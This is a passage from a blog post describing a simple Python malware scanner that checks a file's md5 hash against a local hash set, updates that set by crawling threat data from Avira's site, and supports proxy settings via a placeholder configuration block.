This command takes the md5 hash of the specified file (ex: malware.exe) and searches it in its current hash set (hashset.txt)
and then shows the result.

python malware_check.py update

This command updates its current hash set (hashset.txt) by crawling threat information from http://www.avira.ro &

includes information like virus name, virus type, md5 hash of the virus, severity and discovered date. If there is a hashset.txt it just up to date its current hash set to the latest.

To add proxy support simply edit the .py script and add in the relevant proxy details.

proxy_info = {
    'user' : 'username', # proxy username
    'pass' : 'password', # proxy password
    'host' : "proxy host", # proxy host
    'port' : 8080 # proxy port
    }

You can download the Malware Check Tool here:

Download Malware Check Tool

Like This post ?  You can buy me a Beer :)

 

 

Posted by XERO. ALL RIGHTS RESERVED.

read more "SImple Malware Scanner (Offline & Online)"